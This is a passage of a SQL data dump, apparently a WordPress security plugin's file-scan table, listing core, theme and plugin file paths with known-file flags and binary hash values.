����d��','wp-content/themes/wp-barrister/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o|8�+�z�Y��#�','U&2�l�u\'�䁮�o�嬇/n�{��t���','',0,'?'),('�F�j!Y�{.J=,��','wp-admin/images/stars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����><�k�{��(�','/ ��\"���Fa챔<SY��g���؉F��@','',0,'?'),('�N�.a��v�\r�:���','wp-content/themes/skt-pathway/css/tablet.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I����o��9k�','<�Pk�&ɫ4��[�h\n�V�=\"`��M','',0,'?'),('�]�W/>�}<8� VF�','wp-admin/includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6*pO��,ё� -X�','�4|ǛD}c�Hd�Ɖ)Y[�q�K���-�','',0,'?'),('�^.�jT}�<��I��','wp-admin/js/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j0�P�3#��','!K~�f���nN��B��\0��.@�K�U�','',0,'?'),('�g���U)\rR(�','wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%H2�l�u��[�S��','�8�cyAՕ�n�^�\r;72 y��I\n����','',0,'?'),('�|:��x�Z~�*�wl�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����[f��0�=G�','�[G�f����N���� rG�Ƭ���.','',0,'?'),('�T�B3��G��{','wp-includes/Requests/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�N���knT�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('�;X��^�$>�8','wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js',0,'�Ƒ���l��Ե','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('�Sq o�@rL��H','wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js',0,'���\"���\n�-ۤ�Y','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks� V#� �*','',0,'?'),('頻�yN<���9�o\Z<','wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�\'����>�Y�','�b*/��m/���a�ŵ�>��I湒h��+','',0,'?'),('��m�Mt���W�B','wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�y0�d�Z�o.h��','�_]�<#�S�\"�B^U4_�Q<!@�x?J$��K�','',0,'?'),('�]��{dU�3�p','wp-includes/wp-includes/customize/class-wp-customize-media-control.php',0,'E�lh�¸�j�68��','E�lh�¸�j�68��','V]�l��1W�+ {6v��ޣ��C���=��','',0,'?'),('鸫�/�O|w�Bv]','wp-content/themes/anima/admin/images/image-style-5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l7l,$7t�h�� :5','�_���(��kZXn��Ⱥ�~��5�^���','',0,'?'),('����t���Z�O\'� \n','wp-includes/js/thickbox/macFFBgHack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('����V,E@�X���y','wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��8?Q��h�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('��s�*p�&�[a�y','wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js',0,'4\0�q2�l����d','4\0�q2�l����d','ȩ~��0M���0\"���7 ]1�sP�J�T','',0,'?'),('� �1_E�67���','wp-content/themes/twentynineteen/sass/forms/_buttons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a|2]�e�\"$9z�','\0�Ó\rƱ6� �,�J ��!d7���n��h��','',0,'?'),('�U���b�f܌�`g','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[m�L̉Ȗ�j#�D','�����ۚr(o�Ek\"+/bW/r���p��1','',0,'?'),('�kLN\0��x6@','wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UݪAcT�g�@��{N','�XAݸ.`Q��rC����w@�4b�X���ϭ� ','',0,'?'),('�-.��x�ɤ�R��','wp-admin/includes/privacy-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�/��nC�0^`���','Y\'C5�\'g�u���**Ƭy�%R(�T�S����','',0,'?'),('�0J����fx�#X{�','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('�4���2�)A.;4�','wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q �!�@�٧T\r',' �Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�5��.Q>�k�ċ��_�','wp-includes/wp-includes/SimplePie/Net/IPv6.php',0,'\r ��F�E��,�h�','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�;����o8_<K�4��','wp-content/themes/hueman/functions/init-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ù#k�(]�Ģ�-','�/�ީ��l$���;q����ה2�S9�','',0,'?'),('�A���o�?#�Q.�%�U','wp-content/themes/maxbusiness/template-parts/home-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�6賄��>H@6q','O���5������\n�=1� �E���\'��','',0,'?'),('�J���SQ;Cqn�\nt�','wp-content/themes/auberge/includes/plugins/beaver-builder/beaver-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S.�ƲY��u','d:��*����Fc�j8���{\r\Z��&��}\r','',0,'?'),('�Ov(� ���fF','wp-includes/wp-includes/js/jquery/ui/tabs.min.js',0,'�a`|��^(=`��hv','�a`|��^(=`��hv','L�.X_ �DJ��tk��H��!|��ݔJ��x','',0,'?'),('�Q�A� �=H��7-','wp-includes/js/jquery/ui/droppable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('�S�����_B=�*�','wp-includes/wp-includes/blocks/gallery/block.json',0,'������9��Qv��','������9��Qv��','��PgcZn1q��b�-���x�]ME��ܻ���','',0,'?'),('�cKk@���у4H��=','wp-content/themes/cactus/assets/plugins/bootstrap/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��e��W����','&4\\lw�\0�j�D�n���zVMG\0������','',0,'?'),('�d\n�v;�O1:���,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A\Z����w�d6[�','!��yq�� ����� ������#ҝ;\'','',0,'?'),('�r@��D��Z�䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!K� 5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('�V9o�C��*R�U��','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php',0,'��U!��s^�7�L','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('ꍥ��2jEbg؈W�x�','wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A^�I���4�B\'','ɗ(�|��m��F�EHS7��^��~#����','',0,'?'),('ꐏF�rH�}@$bF��-','wp-content/plugins/wp-cerber/assets/flags/dz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}����Z�A���','~\n����Ào�\'�x�\0��Xh.��}���%�','',0,'?'),('�z-l����Ll&��','wp-content/themes/newsmag/assets/vendors/adsenseloader/jquery.adsenseloader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ۿH�)H3 ��','����g�e���c;�ؘ緻��۔f8-�','',0,'?'),('꤂�,o�Co��):','wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',0,'�y^�������','�y^�������','Y Q�FX��2�2�FW���)���fKSf�','',0,'?'),('�S����6?Ro�n�','wp-content/themes/maxbusiness/images/brands/brand5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z���{�&�M�M#&','��B5A �t���b՞֞M1;C~�k��ظ<�','',0,'?'),('�LJ���4˓T`�k','wp-includes/js/wp-pointer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('꽀F����,�\\e�[','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_slider.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rm!��N��I�S�,�','� �U�W�\"��`��#r�,�<�Wz�iˑ�','',0,'?'),('�ʴ�DY�<\Z>�D}','wp-content/themes/hueman/assets/front/js/_parts/_main_browser_detect.part.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TO�Zj [��','N��;�q~ )�H]np\n+�h�-�Gw8�,E','',0,'?'),('����5�C����','wp-content/themes/promote/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T7�N0$�h�#_`���','�%�Ld�f�|�RB��t��W�������)','',0,'?'),('���v@T��J�[��','wp-includes/wp-includes/blocks/latest-comments/block.json',0,',�i6��xu0\\����',',�i6��xu0\\����','�s�\"9���l���+���/���[�','',0,'?'),('���`I��,�y o�Y','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('��6�Z�fM���;�','wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˈ0@�8�����_B','�r�dy��#�G����}����ZӦtwW�S','',0,'?'),('�a�=�����^~�','wp-content/themes/anima/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@-d4|h�U�#�','�mHð�J��ן�rG]�sˠ��`^�_e','',0,'?'),('�\njݍea!�\ZWd�q','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"<8���.���K�\'',' \ZYӵ�˼*�,Q�L�Y{�㬣p�\r�h���','',0,'?'),('�Q�纊�{�-q��\Zm','wp-content/themes/promote/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5�B�Dt���G','�̸i��k�{��X��YN�w\ZcJ�H�H�-\nb','',0,'?'),('���G}�7��]\n�','wp-content/themes/newsmag/inc/admin/welcome-screen/sections/recommended-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޅ�����c\"ɂ','�䞩���J���3��r.�j���\\���/Ӫ�','',0,'?'),('� �Ck�R=���K','wp-content/themes/promote/inc/kirki/assets/js/functions/set-setting-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nB2��&�c�Sx','+�2�H��a:E�~�e�����|\Z��:�)','',0,'?'),('�-n�$.�#g%�}�','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �OّCH�ؖs� ','pX���uc{�-�Kژ�/OnE0���)JB','',0,'?'),('�0���R�J�{y�ˣ��','wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lGfBp�X0=�aESy','�qǼ<�x��Ӡ�A��X/rUCG�lW�\n*e','',0,'?'),('�8Us� �_��.1Rj','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',0,'�\0��>��@Ue��U','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('�F �8�+�)��r�P�','wp-admin/images/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�d�$��ܟV7�','\n�>���~h�Z���P\0�U0�;\' {�) �>','',0,'?'),('�M\Z���H�?ͲZ','wp-includes/class-wp-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�N�U�[ȹ\n$�+.\0','wp-content/themes/storeone/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*1ܡ�i#�v�vLX�','���.bHԱ��=��\\��-�]3�����k{��','',0,'?'),('�Oӿ�;�=\\J�zy','wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cdxo&l�g�8�3��','�h_�8��r0�y-��\nϥ��KL-� {','',0,'?'),('�QF�0t�+�����','wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{`�q���\'2P','Wf�y�����7hc��ajkgd�4��8�ɢ��','',0,'?'),('�a��u\"9s?�H����','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%1�s���ËG','E��Wٳ�?�4��@U?�0���bP�+�h','',0,'?'),('�fS/\\�����R�O�','wp-includes/wp-includes/js/customize-preview-nav-menus.js',0,'[Nm �l�VҪ3���','[Nm �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�s��Zz�`x�mf: ','wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���]��c��ț��&','mrO�z�Iy�Dz��q�v�˘qZ�����i�','',0,'?'),('�u�̽�[�abٌ(��]','wp-includes/wp-includes/formatting.php',0,'��H(@q���Tj��','��H(@q���Tj��','�g��\n?#��\'^�\'d�8�\Zi��=\Z������','',0,'?'),('�{\rՍ.0��`�On��','wp-admin/images/about-header-brushes.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�:Uy-�ܴ#','��{�kZxS?�t\"Q���?�(�n�r3��','',0,'?'),('�x�D�.���m~<�2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[��M�ɞ�yP��','�@����S��y\'�N+�k�B��3�J!PbƖ�','',0,'?'),('�6�\'���� �b','wp-includes/wp-includes/images/smilies/simple-smile.png',0,'�K��{
��f�w�h','�K��{
��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('뭷\r�!z}ML�K�E','wp-includes/ms-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('��Sڰp��GMǯ�l�','wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5w�pأ����','3ֳ���}��!p�B����A����)k�{�F�','',0,'?'),('�E��e�6\'j6q�C$','wp-includes/wp-includes/SimplePie/HTTP/Parser.php',0,':p��d\'�$�/',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�2�|�?�]���ϸ�','wp-includes/css/dist/nux/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�L��g�a�J\\','��)��v5i�B�:#��%����N�����','',0,'?'),('���F��p�s��4�','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]����H��','���9퇥)R�$px#��q ������{#L�O�','',0,'?'),('�Њtf�P�E+���','wp-includes/wp-includes/js/wp-ajax-response.js',0,'r�Hme_\Z��!5','r�Hme_\Z��!5','��c�����z�2�~;~�D��*T�?�&�','',0,'?'),('��ԖNF��:�1<x�','wp-includes/wp-includes/images/smilies/icon_sad.gif',0,'�Ix�o��TMz��D-','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('��vA�ds�����K�]','wp-admin/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xS���v�N���','�� u�����yA�Ү�B���(��B6�����','',0,'?'),('�މ[|�\r�b�sy','wp-content/themes/newsmag/inc/admin/welcome-screen/welcome-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��K�;D� |�gL�','���TuԞ-SD�b+�VV9f�}����{','',0,'?'),('��YC��o�oR�亞�','wp-includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Iu,�I��WN�7','<�P�ёxC�eo�I)O_d�/�wg�w�1�','',0,'?'),('���@l�UM�?���c�','wp-content/themes/newsmag/template-parts/after-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#]���oTg�[X&r�','\"%�shW�d���e�4���IS%oU\"x�','',0,'?'),('��c�h���{s��\"','wp-content/themes/promote/layout/part-layout1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oH l�,t��}��gvH','�2����`�J�H�Y����Rv�,��I)�','',0,'?'),('�+>B\"W T�(z\\�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',0,'N�+C#+|�fZ���]�','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('�ۅnPE6��T����','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KdW���ؿE�W��','�R��W].da����s��JM�Lq+p�},�','',0,'?'),('�+��^�њ��\r�k','wp-content/plugins/wp-cerber/assets/flags/is.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4o�$�^z1�T�ɪ�','�XƠ8�\'��*ӱ4�$���G\"��JD8�@�6','',0,'?'),('����3 �ꆐ�-=�','wp-content/themes/newsmag/assets/sass/media/_captions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L}�1�������ј','�X�z��n��ѕu�\0��r���a��&}t�','',0,'?'),('�8�ڧ��s}�ն�Ni','wp-includes/class-phpmailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F!;� 24�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('�?����h�����;','wp-includes/js/quicktags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':}���҈P��٭�','=���/���f2A|��d���<��z�N�K=�','',0,'?'),('�D\rh}�����!\n','wp-includes/js/jquery/ui/effect-drop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�Pط��悇̺ƴ$@�','wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�c�ǝu����7���','wp-includes/wp-includes/Requests/Utility/FilteredIterator.php',0,'�X�!Vs�� �AS�','�X�!Vs�� �AS�','Lq4���Z��յ�H\0�e7f=��\r�\nDC>OV','',0,'?'),('�i�:�g�g+���\0�','wp-content/themes/capacious/section-parts/section-about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0�� �','(x�c�f?��%D=�ELܜ�7#i�\"I�','',0,'?'),('�j���p\'*T��)�ãB','wp-includes/wp-includes/js/customize-preview.js',0,'3Q �!�@�٧T\r','3Q �!�@�٧T\r',' �Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�}(^��8,~hyg���','wp-content/plugins/wp-cerber/wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[k�nG���ˡ\"14a','��)Y�.=��E)�#�V W8!E7LOl�','',0,'?'),('�|�`y�YĶ�����o','wp-content/themes/twentytwentyone/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��446ZN�p���T','=SmV��5�9�H�bS�V�u��b��:r�?���','',0,'?'),('�\rǢ.�w\"2�A�V','wp-content/themes/sg-window/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�D��T��^n�� �r','ӭ*]�A5�N����qrV�c/�O���U�j�','',0,'?'),('��c��.D�r� |��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���Z�?f.��8�� ','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('��D5Xgu+��0�@X�','wp-content/themes/promote/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n+D�2#^���U��','\r����5%���%�J�uUR@�S�p��e}I�','',0,'?'),('츃�v��6�;�~�','wp-includes/js/tinymce/utils/mctabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('��!<����B4\ZS�}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�@ަ�$����,','�dٍ|�]���Q��!�Qw����;���`7Zf','',0,'?'),('�[���Ӄ��2�W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�I5�)��JD��\\','��w5ޏ���+>�c\r����^⽍B�]�','',0,'?'),('��h�LzF�˱�=w;�','wp-content/themes/advance/inc/kirki/assets/images/kirki-toolkit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l)����.���5��@','�������th}�9r��N�f��s+k����8','',0,'?'),('�-x�(�E�oI�=�','wp-includes/class-wp-customize-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('��A�6������I�','wp-content/themes/storeone/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h#JFCI�9��� ��',';+z���Y+��c��#�����҄�6�mBh','',0,'?'),('�﹍0If��\r?�K','wp-includes/wp-includes/js/dist/server-side-render.min.js',0,'6�o�i)=�\"p�Jhl','6�o�i)=�\"p�Jhl','m��z��}ힳ�M��|N�b����Zi�-','',0,'?'),('�Ư��0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('�\0�Z{���@�C\\�','wp-includes/wp-includes/images/smilies/icon_cool.gif',0,'\n��`����ivj.�','\n��`����ivj.�','�事F�9;2_ �$�$~�LO�a��6���_','',0,'?'),('�\\�S�Շ��8��;2','wp-includes/class-wp-tax-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}���nBJw�k�0','��,�In����\n���E,��@�h�1����','',0,'?'),('���mה��F@$�~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ofl��A�7�A���','�L���9w����v�G�hK!g�n��g�Cd','',0,'?'),('�,H�IZ���\0�*#k','wp-content/themes/hueman/functions/czr/controls/class-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�d��vf�+��j&�\r',')�.�:octg��R/~ՙ��+;�Rܱ�','',0,'?'),('�3�#��Go�`�U','wp-content/themes/hueman/functions/czr/controls/class-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I=^s�q(U&��N8��','���EK�BF~_N���@�^��\'�7��tTB�','',0,'?'),('�<��(���ߪ�-�n,','wp-content/themes/weblog/acmethemes/customizer/options/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�n�\'z�n��l�','��@[���h�m�,�2��I���SIז','',0,'?'),('�H�����E�S���0','wp-content/themes/capacious/section-parts/section-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�?��\"�|[]%�x','��RU>R��UUB=)Z� ��Df���','',0,'?'),('�LX=8�k�jTB]�','wp-includes/wp-includes/js/twemoji.js',0,'ޮ��!�P��+!�x�','ޮ��!�P��+!�x�','���Q���ӫ��q��6uN�','',0,'?'),('�N��\'�!\rB�j��3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H��!#���>b�W��','�&�x��w�α�h��)�œ@5m��.)9�R','',0,'?'),('�OR(ǹ����O��','wp-content/themes/twentytwenty/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�S�a�N���x0�e\\','\ZY_��tz�)8��b#���D}%]��Dmy��YV�','',0,'?'),('�]��@�\n��>ĺ�Yn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}d��D��TN�\"F�','F�ԝ�q��`�멾���r_���Ȩ_���\'��I','',0,'?'),('�j����G���w��k','wp-content/themes/wp-barrister/content-people.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�:�։w�럙+x�','X9��]M��\'�R8#�֥��< HF�n�L�Bja','',0,'?'),('���I0��B,�hʛp','wp-includes/class-wp-term-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"������4XYt[','��m⟮/�a�Ͳ(yMG.��dЪZ+����','',0,'?'),('��Q��v�J��\0)','wp-content/themes/anima/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E������\Zz','�l�#0�\\�*y>�<��\"`�g�+�9\\�\'+2','',0,'?'),('�������賮]','wp-includes/customize/class-wp-customize-code-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('�Z�\Z�5\n�j�}�@','wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���9���D?_�7E','��Y]K܊�QS駤��k;� ͥ�{/ʅ�j�','',0,'?'),('�F�����m���','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<��>sZ�K�z�e','�̆;�n�E��!��Z�\ZV��V H��w','',0,'?'),('�Z�\ZaYH\0 �5�~ ','wp-admin/includes/class-wp-automatic-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Wŝ#���\"Z��Ɣ]E','f?��Y4e��+���~�ěw�K7�w�Mu���','',0,'?'),('�QR\"��@3��v�S','wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�֞`�1ٕx�w��','����^���R+Ȝ�I5S$i���\0����2�','',0,'?'),('�G� ��~���`�','wp-includes/customize/class-wp-customize-nav-menu-name-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('��f�W�4���%���','wp-content/plugins/wp-cerber/assets/flags/nz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X �7�7��c.�ujߖl','4ȯYI4�T)��H�;�rd�Q��g���Ӆ','',0,'?'),('��M�B�!:�','wp-content/plugins/wp-cerber/assets/flags/it.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{/�z]�>��F@�B�','ⴟ��k �9b��md6�l�{e� o���','',0,'?'),('��5��Y#�#=q�j','wp-content/themes/sg-window/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jF����Ƒ��e','�L�N��S��!�R\nUU\nJ�v@X2��5�π','',0,'?'),('��\Za�]]�A��\'h���','wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iҎ�L�>�e�*�.��','�+Vƃ/�gyg>��\'$�L*yXc� 